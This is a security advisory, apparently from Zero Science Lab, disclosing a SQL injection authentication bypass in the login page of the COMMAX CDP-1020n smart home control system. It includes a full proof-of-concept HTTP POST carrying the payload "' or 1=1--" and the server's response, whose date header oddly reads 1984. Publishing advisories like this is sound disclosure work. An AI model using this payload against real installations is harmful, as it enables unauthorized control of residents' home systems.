COMMAX Smart Home IoT Control System CDP-1020n SQL Injection

`  
COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: CDP-1020n  
481 System  
  
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment  
complex that provides advanced life values and safety.  
  
Desc: The application suffers from an SQL Injection vulnerability. Input passed  
through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised  
before being returned to the user or used in SQL queries. This can be exploited  
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication  
mechanism.  
  
Tested on: Microsoft-IIS/7.5  
ASP.NET  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5662  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php  
  
  
02.08.2021  
  
--  
  
  
POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1  
Host: localhost  
Connection: keep-alive  
Content-Length: 37  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://localhost/mainstart.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: {}  
  
id=%27+or+1%3D1--&x=0&y=0&pass=waddup  
  
  
HTTP/1.1 200 OK  
Cache-Control: private  
Content-Length: 621  
Content-Type: text/html  
Server: Microsoft-IIS/7.5  
Set-Cookie: {}  
X-Powered-By: ASP.NET  
Date: Tue, 03 Aug 1984 22:57:56 GMT  
`